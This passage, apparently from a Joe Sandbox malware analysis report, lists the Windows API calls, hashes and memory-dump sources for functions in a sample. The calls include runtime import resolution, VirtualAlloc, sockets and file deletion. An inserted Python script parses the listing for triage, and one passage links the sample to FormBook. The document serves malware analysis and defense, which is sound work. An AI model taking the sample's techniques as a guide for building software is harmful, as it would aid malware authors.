                                                                          • Opcode Fuzzy Hash: dd135e73f5253f3dd1dd28d1a4e2db2101d518efb61590fe558f65311d0d96eb
                                                                          • Instruction Fuzzy Hash: 4A21D132544219BBDF11CFA4CC86FEA3BB9EF48718F110254FE156B1D0DAB5AC508BA0
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B66FAA
                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B66FBA
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B66FDF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$MoveWindow
                                                                          • String ID: Listbox
                                                                          • API String ID: 3315199576-2633736733
                                                                          • Opcode ID: aca76ee4f15a160f4680b79f94eb3513477bcd731495ba963a7f0d925746b0b8
                                                                          • Instruction ID: 8e1be360e57057e1fb1a99a728ed958d6a073f2b8e2ce1c0016f99f2e09a76d7
                                                                          • Opcode Fuzzy Hash: aca76ee4f15a160f4680b79f94eb3513477bcd731495ba963a7f0d925746b0b8
                                                                          • Instruction Fuzzy Hash: 7D21A172610118BFDF118F54EC85FBB3BAAEF89764F018164FA149B1A0CA75AC51CBA0
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B679E1
                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B679F6
                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B67A03
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: msctls_trackbar32
                                                                          • API String ID: 3850602802-1010561917
                                                                          • Opcode ID: e01dbfedd46639750f31f50128811a1df2f53d88217163de0a73ee7ad9f45187
                                                                          • Instruction ID: 94c8f9b565d32d8dab937902f6ef040a16d0ac1ea58243a25838fdfd8d8071c2
                                                                          • Opcode Fuzzy Hash: e01dbfedd46639750f31f50128811a1df2f53d88217163de0a73ee7ad9f45187
                                                                          • Instruction Fuzzy Hash: F211E772294208BADF109F70CC45FAB37E9EF89768F110519FA41A70E0D6759851CB60
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00AE4C2E), ref: 00AE4CA3
                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AE4CB5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                          • API String ID: 2574300362-192647395
                                                                          • Opcode ID: ae78e103a9072c715cd90e514ce4c5a5ce414fd68712f2c0ffb9763b5ead8d6b
                                                                          • Instruction ID: 961b373b067470ea6a2e4ca6a1ddb77357daf7c7e44338afbed0a6aeb64919e5
                                                                          • Opcode Fuzzy Hash: ae78e103a9072c715cd90e514ce4c5a5ce414fd68712f2c0ffb9763b5ead8d6b
                                                                          • Instruction Fuzzy Hash: 44D05B30510723CFD7209F32ED5871676D9AF05791B25CC7DD885D71A0DBB8D480C650
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00AE4CE1,?), ref: 00AE4DA2
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AE4DB4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-1355242751
                                                                          • Opcode ID: efabf278cbcba020795a061cfa151a61db1097236187ba5013bea9c2ab3be3aa
                                                                          • Instruction ID: e81970fa7f96051af6408d891ebe2fd32f4e755e1f86689a5e90b9e1cae49b4c
                                                                          • Opcode Fuzzy Hash: efabf278cbcba020795a061cfa151a61db1097236187ba5013bea9c2ab3be3aa
                                                                          • Instruction Fuzzy Hash: 5AD01231550713CFD7209F31EC4879676D8AF09395B158879D8C5D61A0DBB4D480C650
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00AE4D2E,?,00AE4F4F,?,00BA62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AE4D6F
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AE4D81
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-3689287502
                                                                          • Opcode ID: 90bc526678b3d974d2ed80ce7a431afc6b3ff18cd68c54b441c85ce90e8f7100
                                                                          • Instruction ID: ab134ef772330e332d65d35ea9094aa66300b3dffabf0f6d3ada002062bf616d
                                                                          • Opcode Fuzzy Hash: 90bc526678b3d974d2ed80ce7a431afc6b3ff18cd68c54b441c85ce90e8f7100
                                                                          • Instruction Fuzzy Hash: 99D01230510753CFD7209F31EC4876676D8BF1A391B158879D486D66A0DAB4D480CA50
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00B612C1), ref: 00B61080
                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B61092
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                          • API String ID: 2574300362-4033151799
                                                                          • Opcode ID: 7f5afdec3733b0844c8078e6abfc5eb4b47a198e5b15da5f1563daa52a0074a7
                                                                          • Instruction ID: a3eb2e0a6d4b3d2fad2ef996e2185fe2989a73109381b9fc70ee8aea8cb78abe
                                                                          • Opcode Fuzzy Hash: 7f5afdec3733b0844c8078e6abfc5eb4b47a198e5b15da5f1563daa52a0074a7
                                                                          • Instruction Fuzzy Hash: 1CD01231510713CFDB205F35E918A2676E4EF05791B15DC79E585D61A0DBB8C4C0C650
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B59009,?,00B6F910), ref: 00B59403
                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B59415
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                          • API String ID: 2574300362-199464113
                                                                          • Opcode ID: a9aaf494437667c0b579ae24ca2e5d41b27e4ae9ce2cb6cfd859f01ec653f6dc
                                                                          • Instruction ID: f4ef858ec8468322d6a32f72f0c36b92b5aaffb22828e17cdd6f8a4f00d5badc
                                                                          • Opcode Fuzzy Hash: a9aaf494437667c0b579ae24ca2e5d41b27e4ae9ce2cb6cfd859f01ec653f6dc
                                                                          • Instruction Fuzzy Hash: F5D01734514713CFDB209F31E90971676E5EF06392B15C8BAE886E66A0EAB8C884DA50
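The five entries above share one shape: LoadLibraryA on kernel32.dll or advapi32.dll followed by GetProcAddress for a single export (GetNativeSystemInfo, Wow64RevertWow64FsRedirection, Wow64DisableWow64FsRedirection, RegDeleteKeyExW, GetModuleHandleExW). The following script is an added example for this report and is not Joe Sandbox code or part of the sample: it parses the text form of these "APIs" lines and pairs each LoadLibraryA with the GetProcAddress that follows it in the same entry, giving the list of imports the binary resolves at run time rather than through its import table. The sample input is constructed from the entries on this page; the line format (bullet, `API.MODULE(args), ref: addr`) is assumed to match what the report renders. Exports resolved this way are commonly ones that are missing on older Windows builds, so a runtime that must still load there looks them up dynamically; the pattern on its own is not what drives the FormBook verdict, which rests on the injection, credential-theft and network signatures listed at the top of the report.

```python
"""Extract runtime-resolved imports from a Joe Sandbox function listing.

Added example for this report (not Joe Sandbox code). Pairs every LoadLibraryA
call with the GetProcAddress that follows it inside the same "APIs" entry.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed sample input: "APIs" lines copied from entries in this report,
# so the script runs offline. For real use, paste the listing into a file.
SAMPLE_LISTING = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00AE4CE1,?), ref: 00AE4DA2
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AE4DB4
Strings
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00AE4D2E,?,00AE4F4F,?,00BA62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AE4D6F
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AE4D81
Strings
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00B612C1), ref: 00B61080
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B61092
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B59009,?,00B6F910), ref: 00B59403
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B59415
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00B56CE4
• WSAGetLastError.WSOCK32(00000000), ref: 00B56CF4
  • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B56D58
• WSAGetLastError.WSOCK32(00000000), ref: 00B56D64
"""

# One call line: "• API.MODULE(arg,arg,...), ref: ADDR" or "• API.MODULE ref: ADDR".
# Ordinal imports appear as "#21". "Part of subcall function ..." lines do not
# match (no "API." before the first space) and are skipped on purpose.
CALL_RE = re.compile(
    r"^\s*•\s*(?P<api>[\w#]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_calls(listing: str) -> List[dict]:
    """Return each call line as {"entry", "api", "module", "args", "ref"}.

    "entry" counts the "APIs" headers seen so far, so that calls belonging to
    different functions are never paired with each other.
    """
    calls: List[dict] = []
    entry = 0
    for line in listing.splitlines():
        if line.strip() == "APIs":
            entry += 1
            continue
        m = CALL_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        calls.append({
            "entry": entry,
            "api": m.group("api"),
            "module": m.group("module"),
            "args": raw_args.split(",") if raw_args else [],
            "ref": m.group("ref"),
        })
    return calls


def dynamic_imports(listing: str) -> List[Tuple[str, str, str]]:
    """Pair LoadLibraryA(lib) with the next GetProcAddress(_, name) in the same entry.

    Returns (library, export, address of the GetProcAddress call). The first
    GetProcAddress argument is the module handle, rendered as 00000000 in the
    listing because it is LoadLibraryA's return value, so it is ignored.
    """
    pairs: List[Tuple[str, str, str]] = []
    pending: Optional[Tuple[int, str]] = None  # (entry, library name)
    for c in parse_api_calls(listing):
        if c["api"] == "LoadLibraryA" and c["args"]:
            pending = (c["entry"], c["args"][0])
        elif c["api"] == "GetProcAddress" and len(c["args"]) >= 2:
            if pending is not None and pending[0] == c["entry"]:
                pairs.append((pending[1], c["args"][1], c["ref"]))
            pending = None
    return pairs


def group_by_library(pairs: List[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """Collapse the pairs into {library: [export, ...]} for a quick triage view."""
    grouped: Dict[str, List[str]] = defaultdict(list)
    for lib, export, _ in pairs:
        grouped[lib.lower()].append(export)
    return dict(grouped)


if __name__ == "__main__":
    for lib, exports in group_by_library(dynamic_imports(SAMPLE_LISTING)).items():
        print(f"{lib}: {', '.join(exports)}")
```

Run against a saved copy of the full listing, the grouped output is a compact list of everything the binary looks up by name at run time; diffing it against the static import table shows which names the author (or the runtime the binary is built on) deliberately kept out of the PE imports.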
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: LocalTime__swprintf
                                                                          • String ID: %.3d$WIN_XPe
                                                                          • API String ID: 2070861257-2409531811
                                                                          • Opcode ID: 3a0c8c9c2155c705731cf54ee1d29ceb5d89b27a0f7dc7a0ca1cb27ae3c89afe
                                                                          • Instruction ID: c07b68cde15da104a931ffedfb1af1484e95cc77a999d0d09a55c11ecb18db68
                                                                          • Opcode Fuzzy Hash: 3a0c8c9c2155c705731cf54ee1d29ceb5d89b27a0f7dc7a0ca1cb27ae3c89afe
                                                                          • Instruction Fuzzy Hash: 40D01271C08168EACB049B94AC888F977FCAB18311F1049E2F90A92040F2749B859B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7af0f85e6ad9413c4e28454049037190cd52bf66e1cd0bce691a31c7451c9669
                                                                          • Instruction ID: 46ad21119fbe3951d4964e5acfbffe6b980953710c658191b0f9e63e8ac3b3d4
                                                                          • Opcode Fuzzy Hash: 7af0f85e6ad9413c4e28454049037190cd52bf66e1cd0bce691a31c7451c9669
                                                                          • Instruction Fuzzy Hash: 36C12AB5A44216EFCB24CF94C884AAEB7F5FF48714B2186D9E805EB251DB30DD41DB90
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?), ref: 00B5E3D2
                                                                          • CharLowerBuffW.USER32(?,?), ref: 00B5E415
                                                                            • Part of subcall function 00B5DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B5DAD9
                                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B5E615
                                                                          • _memmove.LIBCMT ref: 00B5E628
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                                          • String ID:
                                                                          • API String ID: 3659485706-0
                                                                          • Opcode ID: 932ed11ca95bccd48b7e766b85eb427bb340300eb28a3fc7a80a7f5efe0af81d
                                                                          • Instruction ID: 0d40eb06b7f30e4f6b88423d22ccf05e0a991b4f7fe072514947f8ff4a7a31b9
                                                                          • Opcode Fuzzy Hash: 932ed11ca95bccd48b7e766b85eb427bb340300eb28a3fc7a80a7f5efe0af81d
                                                                          • Instruction Fuzzy Hash: 0BC16E716083519FC714DF28C480A6ABBE4FF48714F1489ADF8A99B351D771EA49CF82
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 00B583D8
                                                                          • CoUninitialize.OLE32 ref: 00B583E3
                                                                            • Part of subcall function 00B3DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B3DAC5
                                                                          • VariantInit.OLEAUT32(?), ref: 00B583EE
                                                                          • VariantClear.OLEAUT32(?), ref: 00B586BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                          • String ID:
                                                                          • API String ID: 780911581-0
                                                                          • Opcode ID: 91b118200f88c9aa1353901598b3527eeb6c7e3204ace4303ae9b925e7a81029
                                                                          • Instruction ID: bc3bacf87ce59e9eb88ce345283954a762e9a4ad0a89af83c076656020fdd512
                                                                          • Opcode Fuzzy Hash: 91b118200f88c9aa1353901598b3527eeb6c7e3204ace4303ae9b925e7a81029
                                                                          • Instruction Fuzzy Hash: 06A138752047419FDB10EF15C581B2AB7E4FF88355F144499F99AAB3A2DB30ED04CB92
                                                                          APIs
                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B72C7C,?), ref: 00B37C32
                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B72C7C,?), ref: 00B37C4A
                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00B6FB80,000000FF,?,00000000,00000800,00000000,?,00B72C7C,?), ref: 00B37C6F
                                                                          • _memcmp.LIBCMT ref: 00B37C90
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                          • String ID:
                                                                          • API String ID: 314563124-0
                                                                          • Opcode ID: 4b37b0743431afc3cfaa8fe5e57af2c00ceb0aba357ea7beabe7efaf2a7b5155
                                                                          • Instruction ID: 0580430ede6ec63d305d1729a194f53b921de634b15d8120947333508c138565
                                                                          • Opcode Fuzzy Hash: 4b37b0743431afc3cfaa8fe5e57af2c00ceb0aba357ea7beabe7efaf2a7b5155
                                                                          • Instruction Fuzzy Hash: EE811B75A00109EFCB14DF94C994EEEB7F9FF89315F208198E515AB250DB71AE05CB60
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                          • String ID:
                                                                          • API String ID: 2808897238-0
                                                                          • Opcode ID: 5ec2f8a6903ce9303c7bad0b6a77d43542a34da66a9bde29430d10ef59d34628
                                                                          • Instruction ID: 18c7c8d946595dd0f374338f15548202ead568223d4ac85b5db8ec95c3322778
                                                                          • Opcode Fuzzy Hash: 5ec2f8a6903ce9303c7bad0b6a77d43542a34da66a9bde29430d10ef59d34628
                                                                          • Instruction Fuzzy Hash: F551E374658302AADB34AF69D8D5A3EB3E4EF48310F30C85FE596DB691DF7098449B01
                                                                          APIs
                                                                          • GetWindowRect.USER32(0106F250,?), ref: 00B69AD2
                                                                          • ScreenToClient.USER32(00000002,00000002), ref: 00B69B05
                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00B69B72
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientMoveRectScreen
                                                                          • String ID:
                                                                          • API String ID: 3880355969-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00B56CE4
• WSAGetLastError.WSOCK32(00000000), ref: 00B56CF4
  • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
  • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B56D58
• WSAGetLastError.WSOCK32(00000000), ref: 00B56D64
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B6F910), ref: 00B567BA
• _strlen.LIBCMT ref: 00B567EC
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B4BB09
• GetLastError.KERNEL32(?,00000000), ref: 00B4BB2F
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B4BB54
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B4BB80
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
